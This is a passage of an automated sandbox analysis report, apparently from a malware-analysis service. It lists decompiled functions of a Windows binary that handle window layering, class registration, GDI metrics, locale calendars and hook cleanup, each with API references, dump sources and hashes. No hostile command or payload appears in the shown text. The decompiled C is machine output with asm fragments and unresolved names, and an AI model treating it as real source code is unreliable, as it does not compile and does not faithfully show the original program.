							SetWindowLongA(E0043BD14(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E0043BD14(_t38);
							_push(_t37);
							L00407058();
							return _t37;
						}
					}
				}
				return _t16;
			}







                                                                                0x00452988
                                                                                0x0045298a
                                                                                0x00452990
                                                                                0x004529a5
                                                                                0x004529ac
                                                                                0x004529c1
                                                                                0x004529ca
                                                                                0x004529db
                                                                                0x004529ee
                                                                                0x004529ee
                                                                                0x00000000
                                                                                0x00452a30
                                                                                0x00452a41
                                                                                0x00452a46
                                                                                0x00452a4b
                                                                                0x00452a4d
                                                                                0x00452a51
                                                                                0x00452a56
                                                                                0x00452a57
                                                                                0x00000000
                                                                                0x00452a57
                                                                                0x004529ca
                                                                                0x004529ac
                                                                                0x00452a5e

                                                                                APIs
                                                                                • GetWindowLongA.USER32 ref: 004529BC
                                                                                • SetWindowLongA.USER32 ref: 004529EE
                                                                                • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A28
                                                                                • SetWindowLongA.USER32 ref: 00452A41
                                                                                • 72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004505F4), ref: 00452A57
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesB330Layered
                                                                                • String ID:
                                                                                • API String ID: 1770052509-0
                                                                                • Opcode ID: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction ID: bd31bbafe7edde7c7c57afc0455362de60848b0023f737d7f0b8d26ba890ccd5
                                                                                • Opcode Fuzzy Hash: 894d1980ffac52b3b176b33d3d706154cbcf190e7536c4b35a97a9087a151112
                                                                                • Instruction Fuzzy Hash: 00112B61A0428125DF506B398C89B5B26485B0A318F14257BBD55EB3C7C7BC884C8BEC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041C9FC, Relevance: 7.6, APIs: 5, Instructions: 60registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0041C9FC(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x487714; // 0x400000
				 *0x46b4d0 = _t6;
				_t8 =  *0x46b4e4; // 0x41c9ec
				_t9 =  *0x487714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406CF8 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x487714; // 0x400000
						_t20 =  *0x46b4e4; // 0x41c9ec
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x46b4c0);
				}
				_t13 =  *0x487714; // 0x400000
				_t14 =  *0x46b4e4; // 0x41c9ec
				_t22 = CreateWindowExA(0x80, _t14, 0x41caac, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041C940(_a4, _a8));
				}
				return _t22;
			}














                                                                                0x0041ca03
                                                                                0x0041ca08
                                                                                0x0041ca11
                                                                                0x0041ca17
                                                                                0x0041ca1d
                                                                                0x0041ca25
                                                                                0x0041ca27
                                                                                0x0041ca2a
                                                                                0x0041ca38
                                                                                0x0041ca3a
                                                                                0x0041ca40
                                                                                0x0041ca46
                                                                                0x0041ca46
                                                                                0x0041ca50
                                                                                0x0041ca50
                                                                                0x0041ca57
                                                                                0x0041ca73
                                                                                0x0041ca83
                                                                                0x0041ca8a
                                                                                0x0041ca9b
                                                                                0x0041ca9b
                                                                                0x0041caa6

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                                • String ID:
                                                                                • API String ID: 3404767174-0
                                                                                • Opcode ID: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction ID: 7cb591e502674757c5b69656be4cbc4188d227aadbe7795b2df51ffe080876a5
                                                                                • Opcode Fuzzy Hash: 56e3be3d1ca59384ac2f34a2ececcd87050c90b929dd6f60012172fc4094a416
                                                                                • Instruction Fuzzy Hash: 78015E71644108ABD611EB98DDC1F9A33ADEB08344F104526F905E73D2DB75E89187BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420814, Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 40%
                                                                                			E00420814(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x487a28 == 0) {
					return _v5;
				} else {
					_push(0);
					L00406E20();
					_v12 = __eax;
					_push(_t32);
					_push(0x42089a);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00406AF8();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x487a28; // 0x510805d2
						_push(_t18);
						L00406B20();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x487a28; // 0x510805d2
						_push(_t21);
						L00406B20();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x4208a1);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407080();
					return _t16;
				}
			}













                                                                                0x00420815
                                                                                0x00420817
                                                                                0x0042081d
                                                                                0x00420828
                                                                                0x004208a8
                                                                                0x0042082a
                                                                                0x0042082a
                                                                                0x0042082c
                                                                                0x00420831
                                                                                0x00420836
                                                                                0x00420837
                                                                                0x0042083c
                                                                                0x0042083f
                                                                                0x00420842
                                                                                0x00420844
                                                                                0x00420847
                                                                                0x00420848
                                                                                0x00420850
                                                                                0x00420855
                                                                                0x00420856
                                                                                0x00420858
                                                                                0x0042085a
                                                                                0x0042085f
                                                                                0x00420860
                                                                                0x0042086d
                                                                                0x0042086e
                                                                                0x00420870
                                                                                0x00420872
                                                                                0x00420877
                                                                                0x00420878
                                                                                0x0042087d
                                                                                0x0042087d
                                                                                0x00420883
                                                                                0x00420886
                                                                                0x00420889
                                                                                0x0042088e
                                                                                0x00420891
                                                                                0x00420892
                                                                                0x00420894
                                                                                0x00420899
                                                                                0x00420899

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 0042082C
                                                                                • 72E7AD70.GDI32(?,00000068,00000000,0042089A,?,00000000), ref: 00420848
                                                                                • 72E7AEA0.GDI32(510805D2,00000000,00000008,?,?,00000068,00000000,0042089A,?,00000000), ref: 00420860
                                                                                • 72E7AEA0.GDI32(510805D2,00000008,00000008,?,510805D2,00000000,00000008,?,?,00000068,00000000,0042089A,?,00000000), ref: 00420878
                                                                                • 72E7B380.USER32(00000000,?,004208A1,0042089A,?,00000000), ref: 00420894
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: B380
                                                                                • String ID:
                                                                                • API String ID: 120756276-0
                                                                                • Opcode ID: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction ID: 594b4552e34af1e9033683bc2504567bb3921c278d2cf1e53935ece89b8d96ff
                                                                                • Opcode Fuzzy Hash: 46e97d3204053474f55297d2e6610e9d4d995723f1aca5551efd4b60e66d0a59
                                                                                • Instruction Fuzzy Hash: F81148317483046EEB00EBA4EC92F6E7BE8E708714F5040AAF604EA5C1C9B99404C368
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00461FD4, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E00461FD4(int __eax) {
				int _v8;
				int _t20;
				int _t22;
				intOrPtr _t29;
				int _t32;
				intOrPtr _t34;
				intOrPtr _t36;

				_t34 = _t36;
				_t22 = __eax;
				if( *((char*)(__eax + 0x2e8)) == 1) {
					return __eax;
				} else {
					_push(0);
					L00406E20();
					_v8 = __eax;
					_push(_t34);
					_push(0x462059);
					_push( *[fs:eax]);
					 *[fs:eax] = _t36;
					_push(0x48);
					_t11 = _v8;
					L00406AF8();
					_t32 = MulDiv(E0041EDD0( *((intOrPtr*)(__eax + 0x68))), _v8, _t11);
					 *(_t22 + 0x2b0) = _t32;
					E0045F9D0(_t22, MulDiv(_t32, 0x78, 0x64));
					 *((intOrPtr*)(_t22 + 0x2e4)) =  *((intOrPtr*)(_t22 + 0x234));
					_t29 = 0x5a;
					 *[fs:eax] = _t29;
					_push(0x462060);
					_t20 = _v8;
					_push(_t20);
					_push(0);
					L00407080();
					return _t20;
				}
			}










                                                                                0x00461fd5
                                                                                0x00461fda
                                                                                0x00461fe3
                                                                                0x00462064
                                                                                0x00461fe5
                                                                                0x00461fe5
                                                                                0x00461fe7
                                                                                0x00461fec
                                                                                0x00461ff1
                                                                                0x00461ff2
                                                                                0x00461ff7
                                                                                0x00461ffa
                                                                                0x00461ffd
                                                                                0x00462001
                                                                                0x00462005
                                                                                0x00462019
                                                                                0x0046201b
                                                                                0x0046202f
                                                                                0x0046203a
                                                                                0x00462042
                                                                                0x00462045
                                                                                0x00462048
                                                                                0x0046204d
                                                                                0x00462050
                                                                                0x00462051
                                                                                0x00462053
                                                                                0x00462058
                                                                                0x00462058

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 00461FE7
                                                                                • 72E7AD70.GDI32(?,0000005A,00000048,00000000,00462059,?,00000000), ref: 00462005
                                                                                  • Part of subcall function 0041EDD0: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041EDE1
                                                                                • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462014
                                                                                • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00462026
                                                                                • 72E7B380.USER32(00000000,?,00462060,00000000,00000000,?,0000005A,00000048,00000000,00462059,?,00000000), ref: 00462053
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: B380
                                                                                • String ID:
                                                                                • API String ID: 120756276-0
                                                                                • Opcode ID: 81a1225c8f66191a4a7340aa42bca49ced41bc4e24999cd6ac80d4dc4a324277
                                                                                • Instruction ID: c87c45dc7123c015144318748a061a248af25c350a3f3b7478ec6eef4c47663c
                                                                                • Opcode Fuzzy Hash: 81a1225c8f66191a4a7340aa42bca49ced41bc4e24999cd6ac80d4dc4a324277
                                                                                • Instruction Fuzzy Hash: A501D2B17887047FE700EB65CD46B5A3798DB45704F11007AFA08EB2C2D5BD5C0087A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409B90, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E00409B90(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x409c27);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409908(GetThreadLocale(), 0x409c3c, 0x100b,  &_v8);
				_t29 = E00408708(0x409c3c, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409ADC, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x48781c;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409B18, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E00409C2E);
				return E00404320( &_v8);
			}










                                                                                0x00409b90
                                                                                0x00409b93
                                                                                0x00409b98
                                                                                0x00409b99
                                                                                0x00409b9e
                                                                                0x00409ba1
                                                                                0x00409bb7
                                                                                0x00409bc9
                                                                                0x00409bd3
                                                                                0x00409be3
                                                                                0x00409be8
                                                                                0x00409bed
                                                                                0x00409bf2
                                                                                0x00409bf2
                                                                                0x00409bf8
                                                                                0x00409bfb
                                                                                0x00409bfb
                                                                                0x00409c0c
                                                                                0x00409c0c
                                                                                0x00409c13
                                                                                0x00409c16
                                                                                0x00409c19
                                                                                0x00409c26

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00409C27,?,?,00000000), ref: 00409BA8
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409C27,?,?,00000000), ref: 00409BD8
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009ADC,00000000,00000000,00000004), ref: 00409BE3
                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409C27,?,?,00000000), ref: 00409C01
                                                                                • EnumCalendarInfoA.KERNEL32(Function_00009B18,00000000,00000000,00000003), ref: 00409C0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                • String ID:
                                                                                • API String ID: 4102113445-0
                                                                                • Opcode ID: f9b5190e816450cd29884f56873aa7a7404d889235a34cc2af808d8aafdeda29
                                                                                • Instruction ID: 4bfb94394b26c1de61b809fad384f0f37ea96256bdb679008e2ec987b4910443
                                                                                • Opcode Fuzzy Hash: f9b5190e816450cd29884f56873aa7a7404d889235a34cc2af808d8aafdeda29
                                                                                • Instruction Fuzzy Hash: 4201F7717042046BE70176658D12B5E729CDB86724FB14536F501FB6C2D67C9E00466C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453F88, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00453F88() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x487c14 != 0) {
					_t10 =  *0x487c14; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x487c14 = 0;
				if( *0x487c18 != 0) {
					_t2 =  *0x487c10; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x487c0c) {
						_t8 =  *0x487c18; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x487c18; // 0x0
					CloseHandle(_t5);
					 *0x487c18 = 0;
					return 0;
				}
				return 0;
			}







                                                                                0x00453f8f
                                                                                0x00453f91
                                                                                0x00453f97
                                                                                0x00453f97
                                                                                0x00453f9e
                                                                                0x00453faa
                                                                                0x00453fac
                                                                                0x00453fb2
                                                                                0x00453fc2
                                                                                0x00453fc6
                                                                                0x00453fcc
                                                                                0x00453fcc
                                                                                0x00453fd1
                                                                                0x00453fd7
                                                                                0x00453fde
                                                                                0x00000000
                                                                                0x00453fde
                                                                                0x00453fe3

                                                                                APIs
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00453F97
                                                                                • SetEvent.KERNEL32(00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FB2
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453FB7
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FCC
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00456232,00000000,0045530F,?,?,0046AE10,00000001,004553CF,?,?,?,0046AE10), ref: 00453FD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                • String ID:
                                                                                • API String ID: 2429646606-0
                                                                                • Opcode ID: b04f38ba4defd6c5de64de1a433f38defa01984694019d89562f8b4e7c6d09ea
                                                                                • Instruction ID: a3b23e4da45633cf8d10c80a91931710e342de8fee76660524c995d76fe24a38
                                                                                • Opcode Fuzzy Hash: b04f38ba4defd6c5de64de1a433f38defa01984694019d89562f8b4e7c6d09ea
                                                                                • Instruction Fuzzy Hash: E1F09E7290D1009AC750EB79DE99A4D33E86704395B204D3EB211D72A1DA38D5C48BBD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045EE44, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E0045EE44(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E0045FCF8(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x45f1ef);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E00436C60(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045C76C(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037B0(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E004350A4(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E0045D160(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045C710(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E0041295C(_t294,  &_v132, _a4);
												_push( &_v132);
												_t184 = E004037B0(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E0045D2A0(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E0041295C(_t294,  &_v132, _a4);
							_push( &_v132);
							_t204 = E004037B0(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E0045D2A0(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043BD14(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E0045DDD8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E0045DD50(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E0045DDD8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E0045FDD4(_v8, _t294, _t297);
							L21:
							E004037B0(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045B6B8(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037B0(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037B0(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045B628(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E004358D8(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E0044CA54(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}





































                                                                                0x0045ee4d
                                                                                0x0045ee50
                                                                                0x0045ee52
                                                                                0x0045ee55
                                                                                0x0045ee58
                                                                                0x0045ee5f
                                                                                0x0045ee64
                                                                                0x0045ee67
                                                                                0x0045ee6b
                                                                                0x0045eeaf
                                                                                0x0045eeaf
                                                                                0x0045eeb1
                                                                                0x0045eeca
                                                                                0x0045eeca
                                                                                0x0045eecc
                                                                                0x0045f1c5
                                                                                0x0045f1c8
                                                                                0x0045f1cd
                                                                                0x0045f1d0
                                                                                0x0045f1e0
                                                                                0x0045f1e7
                                                                                0x0045f1ea
                                                                                0x00000000
                                                                                0x0045f1ea
                                                                                0x0045eed8
                                                                                0x0045ef0d
                                                                                0x0045ef0f
                                                                                0x0045ef18
                                                                                0x0045ef1f
                                                                                0x0045ef24
                                                                                0x0045ef2b
                                                                                0x0045ef30
                                                                                0x0045ef34
                                                                                0x0045ef39
                                                                                0x0045ef3b
                                                                                0x0045ef48
                                                                                0x0045ef48
                                                                                0x0045ef51
                                                                                0x0045ef51
                                                                                0x0045ef3b
                                                                                0x00000000
                                                                                0x0045ef5d
                                                                                0x0045ef6f
                                                                                0x0045ef77
                                                                                0x0045ef7c
                                                                                0x0045ef85
                                                                                0x0045ef88
                                                                                0x0045ef8a
                                                                                0x0045f04a
                                                                                0x0045f04a
                                                                                0x0045f04d
                                                                                0x0045f054
                                                                                0x0045f10e
                                                                                0x0045f10e
                                                                                0x0045f111
                                                                                0x0045f118
                                                                                0x0045f11e
                                                                                0x0045f122
                                                                                0x0045f128
                                                                                0x0045f131
                                                                                0x0045f134
                                                                                0x0045f143
                                                                                0x0045f146
                                                                                0x0045f14b
                                                                                0x0045f14e
                                                                                0x0045f157
                                                                                0x0045f165
                                                                                0x0045f16d
                                                                                0x0045f187
                                                                                0x0045f18c
                                                                                0x0045f18e
                                                                                0x0045f193
                                                                                0x0045f19f
                                                                                0x0045f1a8
                                                                                0x0045f1ad
                                                                                0x0045f1c0
